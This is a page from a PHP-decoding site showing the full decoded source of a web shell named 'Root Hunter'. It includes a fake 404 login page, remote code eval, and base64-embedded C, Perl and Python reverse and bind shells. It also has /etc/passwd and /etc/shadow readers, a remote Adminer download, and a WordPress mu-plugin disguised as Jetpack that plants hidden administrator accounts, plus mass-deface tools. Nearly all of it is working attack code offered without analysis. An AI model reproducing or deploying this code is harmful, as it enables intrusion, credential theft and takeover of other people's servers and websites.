Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

1 <?php goto W2Gtj;gXAzU:function actionDeface(){hardHeader();echo "\x3c\143\x65\156\16..

Decoded Output download

 
1 
<?php goto W2Gtj;gXAzU:function actionDeface(){hardHeader();echo "<center><h1>Mass Deface</h1><div class=content><br>";echo "<br><center> <iframe frameBorder=0 src='?mas' width='800' height='450'></iframe></a></div>";hardFooter();}goto sVdqn;Heuhn:if(!$safe_mode){error_reporting(0);}goto ZiHyv;WwD7E:function actionpassw(){hardHeader();echo "<center><h1>Bypass: /etc/passwd</h1><div class=content><br>";echo "<br><center>  <iframe frameBorder=0 src='?passwd' width='900' height='400'></iframe></a>";echo "</div>";hardFooter();}goto gA0nc;wgCev:if(!isset($_POST["ne"])){if(isset($_POST["a"])){$_POST["a"]=iconv("utf-8",$_POST["charset"],decrypt($_POST["a"],$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]));}if(isset($_POST["c"])){$_POST["c"]=iconv("utf-8",$_POST["charset"],decrypt($_POST["c"],$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]));}if(isset($_POST["p1"])){$_POST["p1"]=iconv("utf-8",$_POST["charset"],decrypt($_POST["p1"],$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]));}if(isset($_POST["p2"])){$_POST["p2"]=iconv("utf-8",$_POST["charset"],decrypt($_POST["p2"],$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]));}if(isset($_POST["p3"])){$_POST["p3"]=iconv("utf-8",$_POST["charset"],decrypt($_POST["p3"],$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]));}}goto wVm3J;PxqVi:function actionreversephp(){hardHeader();echo "<center><h1>Reverse TCP PHP</h1><div class=content><br>";echo "<br><center>  <iframe frameBorder=0 src='?reversephp' width='900' height='300'></iframe></a>";echo "</div>";hardFooter();}goto Y4Cln;IHn50:ob_start();goto mL35z;ayxVY:function actionNetwork(){hardHeader();$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";$pyy="IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo "<center><h1>Network tools</h1><div class=content>\xa<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'><br>\xa<span>Bind port to /bin/sh</span><br/>\xaPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpp'>Perl</option><option value='bpc'>C</option></select></label> <input type=submit value='submit'>\xa</form><br>\xa<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
<span>Back-connect to</span><br/>\xaServer: <input type='text' name='server' value=".$_SERVER["REMOTE_ADDR"]."> Port: <input type='text' name='port' value='21'> Using: <label><select name='using'><option value='bcpy'>Python</option><option value='bcp'>Perl</option><option value='bcc'>C</option></select></label> <input type=submit value='submit'><br><br><br>
</form><br>";if(isset($_POST["p1"])){function cf($f,$t){$w=@fopen($f,"w")or@function_exists("file_put_contents");if($w){@fwrite($w,@base64_decode($t))or@fputs($w,@base64_decode($t))or@file_put_contents($f,@base64_decode($t));@fclose($w);}}if($_POST["p1"]=="bpc"){cf("/tmp/bp.c",$bind_port_c);$asciifnc7=ex("gcc -o /tmp/bp /tmp/bp.c");@unlink("/tmp/bp.c");$asciifnc7.=ex("/tmp/bp ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>{$asciifnc7}".ex("ps aux | grep bp")."</pre>";}if($_POST["p1"]=="bpp"){cf("/tmp/bp.pl",$bind_port_p);$asciifnc7=ex(which("perl")." /tmp/bp.pl ".$_POST["p2"]." &");echo"<pre class=ml1>{$asciifnc7}".ex("ps aux | grep bp.pl")."</pre>";}if($_POST["p1"]=="bcc"){cf("/tmp/bc.c",$back_connect_c);$asciifnc7=ex("gcc -o /tmp/bc /tmp/bc.c");@unlink("/tmp/bc.c");$asciifnc7.=ex("/tmp/bc ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>{$asciifnc7}".ex("ps aux | grep bc")."</pre>";}if($_POST["p1"]=="bcp"){cf("/tmp/bc.pl",$back_connect_p);$asciifnc7=ex(which("perl")." /tmp/bc.pl ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>{$asciifnc7}".ex("ps aux | grep bc.pl")."</pre>";}if($_POST["p1"]=="bcpy"){cf("/tmp/bc.py",$back_connect_p);$asciifnc7=ex(which("perl")." /tmp/bc.py ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>{$asciifnc7}".ex("ps aux | grep bc.py")."</pre>";}}echo "</div>";hardFooter();}goto f0fIh;ssGFZ:$asciifnc1=true;goto CsYiQ;wRb2p:$cwd=@getcwd();goto TuU0I;BOvTm:ini_set("log_errors_max_len",0);goto f_t7R;f0fIh:if(isset($_REQUEST["user"])){echo "<style>input[type=submit].custom-tools-buttons{font-size:14px!important;padding:5px 10px!important;margin:0 5px!important;font-weight:700!important;cursor:pointer!important;color:#e1e1e1!important;background-color:#060a10!important;border:1px solid #9c982e!important}</style>\xa</head>\xa<center>
<form method='post'>\xa<input type='submit' class='custom-tools-buttons' name='ch' value='Inject MU Plugins'>\xa</form>\xa</center>";set_time_limit(0);error_reporting(0);if($_POST["ch"]){$isimu=base64_decode("PD9waHAKLyoKUGx1Z2luIE5hbWU6IEpldHBhY2sgU2VydmVyIENvbXBhdGliaWxpdHkgZm9yIFdvcmRQcmVzcwpQbHVnaW4gVVJJOiBodHRwczovL3dvcmRwcmVzcy5vcmcvCkRlc2NyaXB0aW9uOiBXb3JkUHJlc3Mgc2VjdXJpdHksIHBlcmZvcm1hbmNlLCBtYXJrZXRpbmcsIGFuZCBkZXNpZ24gdG9vbHMg4oCUIEpldHBhY2sgaXMgbWFkZSBieSBXb3JkUHJlc3MgZXhwZXJ0cyB0byBtYWtlIFdQIHNpdGVzIHNhZmVyIGFuZCBmYXN0ZXIsIGFuZCBoZWxwIHlvdSBncm93IHlvdXIgdHJhZmZpYy4KVmVyc2lvbjogMS4wLjEzCkF1dGhvcjogQXV0b21hdHRpYwpBdXRob3IgVVJJOiBodHRwczovL3dvcmRwcmVzcy5vcmcvCiovCmFkZF9hY3Rpb24oICdpbml0JywgZnVuY3Rpb24gKCkgewogICAgJGhhc2ggPSAiYzM5MzI4VnVaMjk5MzI4a2EybHU5MzI4WnpnNFFHZDkzMjh0WVdsc0w5MzI4bU52OTMyOGJRPT0iOwogICAgJGtleSA9IHN0cl9yZXBsYWNlKCIzMjBkOCIsIiIsInMzMjBkOHQzMjBkOHIzMjBkOF8zMjBkOHIzMjBkOGUzMjBkOHAzMjBkOGwzMjBkOGEzMjBkOGMzMjBkOGUiKTsKICAgICRob29rX2FjdGlvbiA9ICdiYScuJ3MnLidlNicuJzQnLidfJy4nZCcuJ2UnLidjJy4nb2RlJzsKICAgICR3cF9ob29rID0gJGhvb2tfYWN0aW9uKCJTa0ZPUTA5SCIpOwogICAgJHdwX2FjdGlvbiA9ICRob29rX2FjdGlvbigka2V5KCI5MzI4IiwgIiIsICRoYXNoKSk7CmlmICggISB1c2VybmFtZV9leGlzdHMoICR1c2VybmFtZSApICkgewogICAgJHVzZXJfaWQgPSB3cF9jcmVhdGVfdXNlciggJHVzZXJuYW1lLCAkd3BfaG9vaywgJHdwX2FjdGlvbiApOwogICAgJHVzZXIgPSBuZXcgV1BfVXNlciggJHVzZXJfaWQgKTsKICAgICR1c2VyLT5zZXRfcm9sZSggJ2FkbWluaXN0cmF0b3InICk7Cn0gZWxzZSB7CiAgICAkdXNlcl9pZCA9IHdwX2NyZWF0ZV91c2VyKCAnd29yZHByZXNzX3NlY3VyaXR5JywgJHBhc3N3b3JkLCAkZW1haWxfYWRkcmVzcyApOwogICAgJHVzZXIgPSBuZXcgV1BfVXNlciggJHVzZXJfaWQgKTsKICAgICR1c2VyLT5zZXRfcm9sZSggJ2FkbWluaXN0cmF0b3InICk7Cn0gfSApOwo/Pg==");$mu_result='';$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["DOCUMENT_ROOT"]){$wpcon=$startDirectory."/wp-content//";$muplug=$startDirectory."/wp-content/mu-plugins/";}else{$wpcon=$_SERVER["DOCUMENT_ROOT"]."/wp-content//";$muplug=$_SERVER["DOCUMENT_ROOT"]."/wp-content/mu-plugins/";}$array=array();$array[]="jetpack-wordpress.php";$array[]="jetpack-for-wordpress.php";$array[]="jetpack-compatibility.php";$array[]="jetpack-nginx-compatibility.php";$array[]="jetpack-litespeed-compatibility.php";$array[]="jetpack-apache-compatibility.php";$muname=$array[mt_rand(0,count($array)-1)];if(is_writeable($wpcon)){if(!is_dir($muplug)){mkdir($muplug,493,true);$plugmu=$muplug.$muname;$status=file_put_contents($plugmu,$isimu);if($status){$mu_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy MU Plugins!</span>&nbsp;&nbsp;&nbsp; {$plugmu}<br><br>Username: wordpress / wordpress_security <br>Password: JANCONG";chmod($plugmu,292);}else{$mu_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy MU Plugins!</span><br>";}}else{chmod($muplug,493);$plugmu=$muplug.$muname;$status=file_put_contents($plugmu,$isimu);if($status){$mu_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy MU Plugins!</span>&nbsp;&nbsp;&nbsp; <span style=color:#fff!important;>{$plugmu}</span><br><br><span style=color:#fff!important;font-weight:bold;>Username:</span> <span style=color:#fff!important;>wordpress / wordpress_security <br></span><span style=color:#fff!important;font-weight:bold;>Password:</span> <span style=color:#fff!important;>JANCONG</span>";chmod($plugmu,292);}else{$mu_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy MU Plugins!</span><br>";}}}}echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($mu_result).PHP_EOL;echo "</div>";echo "</body></html>";die;}goto BzF5d;sHJzm:$safe_mode=@ini_get("safe_mode");goto Heuhn;T_JGw:ini_set("display_errors",0);goto QouUw;hflHy:function actionAdminer(){hardHeader();echo "<center><h1>Adminer</h1><div class=content><br>";$full=str_replace($_SERVER["DOCUMENT_ROOT"],'',$dir);function adminer($url,$isi){$fp=fopen($isi,"w");$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_BINARYTRANSFER,true);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_FILE,$fp);return curl_exec($ch);curl_close($ch);fclose($fp);ob_flush();flush();}if(file_exists("admin-user.php")){echo "<center><font color=white><br><a href='admin-user.php' target='_blank'>[ Adminer login ]</a><br><br><br></font></center>";}else{if(adminer("https://gist.githubusercontent.com/pujiantolmao/8440545c0f8385f6255b8763cf3b9e88/raw/e02b1cb8b8c08ddc6a76b064a137301fc99a8ce4/adminer.php","admin-user.php")){echo "<center><font color=white><br><br><a href='admin-user.php' target='_blank'>[ Adminer login ]</a><br><br></font></center>";}else{echo "<center><font color=red>Gagal Taro Adminer</font></center>";}}hardFooter();}goto Jclr3;d0Oeq:function actionEdituser(){hardHeader();echo "<center><h1>Wordpress Mass User Changer</h1><div class=content><br>";echo "<br><center>  <iframe frameBorder=0 src='?user' width='900' height='400'></iframe></a>";echo "</div>";hardFooter();}goto abTW4;gn4fB:$asciifnc4=sha1(md5($_SERVER["HTTP_USER_AGENT"]));goto Cxc8F;WKUxM:function actionbypas(){hardHeader();echo "<center><h1>Bypass Tools</h1><div class=content><br>";echo "<th><a href='#' onclick='g("passw",null,"s_name_".($sort[1]?0:1)."")'> [ Bypass: /etc/passwd ] </a></th><p>";echo "<th><a href='#' onclick='g("disable",null,"s_name_".($sort[1]?0:1)."")'> [ Bypass: Disbaled Functions ] </a></th>";echo "</div>";hardFooter();}goto PxqVi;bLZtb:function actionRC(){if(!@$_POST["p1"]){$a=array("uname"=>php_uname(),"php_version"=>phpversion(),"VERSION"=>VERSION,"safemode"=>@ini_get("safe_mode"));echo serialize($a);}else{eval($_POST["p1"]);}}goto yV96F;ywNC9:$auth_pass5="d837e2ba3c550f679150be66882c7c47f06adb37";goto RSlVA;Of1wl:if(!function_exists("posix_getgrgid")&&strpos($GLOBALS["disable_functions"],"posix_getgrgid")===false){function posix_getgrgid($p){return false;}}goto W8DS5;Zs2Nm:ini_set("log_errors",0);goto BOvTm;AXSyi:if(!empty($auth_pass5)){if(isset($_POST[$keyxx])and sha1(md5($_POST[$keyxx]))==$auth_pass5){prototype(sha1(md5($_SERVER["HTTP_HOST"])),$auth_pass5);}if(!isset($_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))])||$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))]!=$auth_pass5){printLoginx();}}goto ExF9C;ztzEK:function generateRandomString($length=10){$characters="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$charactersLength=strlen($characters);$randomString='';for($i=0;$i<$length;$i++){$randomString.=$characters[rand(0,$charactersLength-1)];}return $randomString;}goto ywNC9;sww2V:function actionSecInfo(){hardHeader();echo "<h1>Server security information</h1><div class=content>";function showSecParam($n,$v){$v=trim($v);if($v){echo "<span>".$n.": </span>";if(strpos($v,"\xa")===false){echo $v."<br>";}else{echo "<pre class=ml1>".$v."</pre>";}}}showSecParam("Server software",@getenv("SERVER_SOFTWARE"));if(function_exists("apache_get_modules")){showSecParam("Loaded Apache modules",implode(", ",apache_get_modules()));}showSecParam("Disabled PHP Functions",$GLOBALS["disable_functions"]?$GLOBALS["disable_functions"]:"none");showSecParam("Open base dir",@ini_get("open_basedir"));showSecParam("Safe mode exec dir",@ini_get("safe_mode_exec_dir"));showSecParam("Safe mode include dir",@ini_get("safe_mode_include_dir"));showSecParam("cURL support",function_exists("curl_version")?"enabled":"no");$temp=array();if(function_exists("mysql_get_client_info")){$temp[]="MySql (".mysql_get_client_info().")";}if(function_exists("mssql_connect")){$temp[]="MSSQL";}if(function_exists("pg_connect")){$temp[]="PostgreSQL";}if(function_exists("oci_connect")){$temp[]="Oracle";}showSecParam("Supported databases",implode(", ",$temp));echo "<br>";if($GLOBALS["os"]=="nix"){showSecParam("Readable /etc/passwd",@is_readable("/etc/passwd")?"yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>":"no");showSecParam("Readable /etc/shadow",@is_readable("/etc/shadow")?"yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>":"no");showSecParam("OS version",@file_get_contents("/proc/version"));showSecParam("Distr name",@file_get_contents("/etc/issue.net"));if(!$GLOBALS["safe_mode"]){$userful=array("gcc","lcc","cc","ld","make","php","perl","python","ruby","tar","gzip","bzip","bzip2","nc","locate","suidperl");$danger=array("kav","nod32","bdcored","uvscan","sav","drwebd","clamd","rkhunter","chkrootkit","iptables","ipfw","tripwire","shieldcc","portsentry","snort","ossec","lidsadm","tcplodg","sxid","logcheck","logwatch","sysmask","zmbscap","sawmill","wormscan","ninja");$downloaders=array("wget","fetch","lynx","links","curl","get","lwp-mirror");echo "<br>";$temp=array();foreach($userful as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("Userful",implode(", ",$temp));$temp=array();foreach($danger as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("Danger",implode(", ",$temp));$temp=array();foreach($downloaders as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("Downloaders",implode(", ",$temp));echo "<br/>";showSecParam("HDD space",ex("df -h"));showSecParam("Hosts",@file_get_contents("/etc/hosts"));showSecParam("Mount options",@file_get_contents("/etc/fstab"));}}else{showSecParam("OS Version",ex("ver"));showSecParam("Account Settings",iconv("CP866","UTF-8",ex("net accounts")));showSecParam("User Accounts",iconv("CP866","UTF-8",ex("net user")));}echo "</div>";hardFooter();}goto B09fV;uVFz3:error_reporting(0);goto qJRtx;zA5El:function printLoginx(){if(!empty($_SERVER["HTTP_USER_AGENT"])){$userAgents=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");if(preg_match("/".implode("|",$userAgents)."/i",$_SERVER["HTTP_USER_AGENT"])){header("HTTP/1.0 404 Not Found");die;}}die("<!DOCTYPE html><html><head><meta name="robots" content"noindex. nofollow"><title>404 Not Found</title></head><body>
	<h1>Not Found</h1> 
\x9    <title>404 Not Found</title>\xa\x9<style type="text/css">
\x9input[type=password] {
	    width: 250px;\xa\x9    height: 25px;
\x9    color: white;
	    background: transparent;
\x9    border: 1px solid white;\xa\x9    margin-left: 20px;\xa	    text-align: center;
	}\xa\x9</style>
	    <p>The requested URL was not found on this server.</p> 
	<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> \xa	<hr> 
	<address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port ".$_SERVER["SERVER_PORT"]."</address> 
\xa	<center><form method="post"><input type="password" name="".$_SESSION["keyxx"]."" autocomplete="off"><br></form></center></body></html>
\x9");}goto IHn50;hKElW:if(!empty($_POST["a"])&&function_exists("action".$_POST["a"])){call_user_func("action".$_POST["a"]);}goto TODUM;Bxufz:function hardScandir($dir){if(function_exists("scandir")){return scandir($dir);}else{$dh=opendir($dir);while(false!==($filename=readdir($dh))){$files[]=$filename;}return $files;}}goto GoQMc;BzF5d:if(empty($_POST["a"])){if(isset($asciifnc3)&&function_exists("action".$asciifnc3)){$_POST["a"]=$asciifnc3;}else{$_POST["a"]="FilesMan";}}goto hKElW;HaRXp:function hardHeader(){if(empty($_POST["charset"])){$_POST["charset"]=$GLOBALS["asciifnc2"];}echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=".$_POST["charset"]."'>\xa<title>Root Hunter</title>
<meta name="robots" content="noindex,nofollow,noarchive" />\xa<script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script>\xa<link rel="shortcut icon" href="https://forum.es.ogame.gameforge.com/images/avatars/e1/1301-e1d7cbac11c60e833b55af467b43a9459c0959b5.png">
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet'>\xa<style>body{background-color:#060a10;color:#e1e1e1;margin:0;font:normal 75% Arial,Helvetica,sans-serif}canvas{display:block;vertical-align:bottom}#particles-js{width:100%;height:100px;background-color:#060a10;background-image:url('');background-repeat:no-repeat;background-size:cover;background-position:50% 50%}body,td,th{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top}table.info{color:#c3c3c3}table#toolsTbl{background-color:#060a10}a,h1,span{color:#fff!important}span{font-weight:bolder}h1{border-left:5px solid #9c982e;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0}div.content{padding:5px;margin-left:5px;background-color:#060a10}a{text-decoration:none}a:hover{text-decoration:underline;color:#ffdb5f!important}.tooltip::after{background:#0663d5;color:#fff;content:attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden}.tooltip:hover::after{opacity:1;visibility:visible}.ml1{border:1px solid #202832;padding:5px;margin:0;overflow:auto}.bigarea{min-width:100%;max-width:100%;height:400px}.small{min-width:100%;max-width:100%;height:100px}input,select,textarea{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:0}label{position:relative}label:after{content:'<>';font:10px Consolas,monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px;top:3px;padding:0;position:absolute;pointer-events:none}label:before{content:'';right:0;top:0;width:17px;height:17px;background:#202832;position:absolute;pointer-events:none;display:block}form{margin:0}#toolsTbl{text-align:center}#fak{background:0 0}#fak td{padding:5px 0 0 0}iframe{border:1px solid #060a10}.toolsInp{width:300px}.main th{text-align:left;background-color:#060a10}.main tr:hover{background-color:#354252}.main td,th{vertical-align:middle}input[type=submit]{background-color:#9c982e}input[type=button]{background-color:#9c982e}input[type=submit]:hover{background-color:#ffdb5f}input[type=button]:hover{background-color:#ffdb5f}.l1{background-color:#202832}pre{font:9pt Courier New}input[type=submit].custom-tools-buttons{font-size:14px!important;padding:5px 10px!important;margin:0 5px!important;font-weight:700!important;cursor:pointer!important;color:#e1e1e1!important;background-color:#060a10!important;border:1px solid #9c982e!important}input[type=submit].custom-tools-buttons:hover{background-color:#9c982e!important}</style>
<script>
var c_ = '".htmlspecialchars($GLOBALS["cwd"])."';
var a_ = '".htmlspecialchars(@$_POST["a"])."'
var charset_ = '".htmlspecialchars(@$_POST["charset"])."';\xavar p1_ = '".(strpos(@$_POST["p1"],"
")!==false?'':htmlspecialchars($_POST["p1"],ENT_QUOTES))."';\xavar p2_ = '".(strpos(@$_POST["p2"],"
")!==false?'':htmlspecialchars($_POST["p2"],ENT_QUOTES))."';\xavar p3_ = '".(strpos(@$_POST["p3"],"\xa")!==false?'':htmlspecialchars($_POST["p3"],ENT_QUOTES))."';\xavar d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
